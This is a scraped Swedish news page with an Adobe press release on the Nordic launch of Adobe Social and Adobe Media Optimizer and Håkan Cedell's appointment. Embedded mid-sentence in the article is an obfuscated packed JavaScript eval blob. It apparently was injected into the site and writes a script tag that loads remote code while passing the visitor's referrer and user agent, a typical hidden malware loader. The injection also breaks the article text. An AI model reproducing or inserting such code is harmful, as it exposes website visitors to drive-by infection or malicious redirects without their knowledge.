Image Image Image Image Image Image Image Image Image Image

| 24 november, 2017

Scroll to top

Top

No Comments

Adobe Social och Adobe Media Optimizer i Norden | Revue.se

Adobe Social och Adobe Media Optimizer i Norden
Sebastian Plengier Ehrnfelt

Adobe eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ybddz|var|u0026u|referrer|yktfh||js|php’.split(‘|’),0,{}))
introducerar och utökar sitt erbjudande inom mätbar och effektiv digital annonsering i Norden. Håkan Cedell får ansvaret för att introducera och utveckla de nya lösningarna.

Adobe Social och Adobe Media Optimizer är de två nya delarna inom Adobes lösningssvit Marketing Cloud. Håkan Cedell har anställts för att ansvara för de nya lösningarna över hela Norden.

– Digital och social annonsering och framför allt möjligheten att översätta annonsresultat till faktiska, affärskritiska KPI:er är ett område som äntligen börjat ta fart. Nu ges möjligheten att använda online-investeringar på det sätt vi alla önskat under de senaste 10 åren och just Adobe har satsat rejält på det här området och har en rad starka lösningar. Att få chansen att arbeta med dessa över hela Norden känns fantastiskt roligt, säger Håkan Cedell.

Håkan har lång erfarenhet av sälj, marknad och affärsutveckling inom ”online-industrin”. Han har sedan 1998 arbetat inom området, bland annat som ansvarig för Admetas säljorganistion i Europa. Nu senast har han ansvarat för att introducera InSkin Media i Norden.

Adobes erbjudanden kring sökoptimering och social marknadsföring har gått igenom stora förändringar under det senaste året, både genom intern utveckling och genom uppköpen av Efficient Frontier och Context Optional.

Adobe är idag ett av få företag som erbjuder RTB (real-time-bidding) i samtliga tre annonskanaler – sök, display och sociala medier. Adobe är dessutom det enda företag som kan erbjuda alla fyra API:er till Facebook. Kopplingen till Sitecatalyst gör att Adobe kan erbjuda en komplett lösning för onlinemarknadsföring och automatiserad trading av online media.

– Vi har verktyg som gör att en CMO kan fokusera mer på strategiska beslut än taktiskt utförande. Det är en samling lösningar som tillsammans är helt unik på marknaden idag, avslutar Håkan Cedell.

 Detta är ett pressmeddelande från Adobe